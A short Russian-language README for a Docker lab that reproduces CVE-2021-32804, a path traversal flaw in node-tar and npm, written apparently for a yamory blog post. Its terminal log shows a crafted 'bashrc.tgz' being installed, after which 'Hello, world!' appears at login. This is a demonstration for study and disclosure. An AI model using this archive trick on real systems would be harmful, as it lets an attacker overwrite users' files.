
Docker-based среда воспроизведения для CVE-2021-32804, уязвимости обхода пути в node-tar, затрагивающей npm, с пошаговыми скриптами эксплуатации.
Это репозиторий для создания Docker-среды, использованной в блоге yamory «Уязвимость path traversal в node-tar, затрагивающая также npm, CVE-2021-32804».
docker build -t cve-2021-32804 .
docker run -it cve-2021-32804 /bin/bash
root@5e1af2148215:/poc# node tar.js
root@5e1af2148215:/poc# su node
Hello, world!
root@5e1af2148215:/poc# npm i bashrc.tgz
root@5e1af2148215:/poc# su node
Hello, world!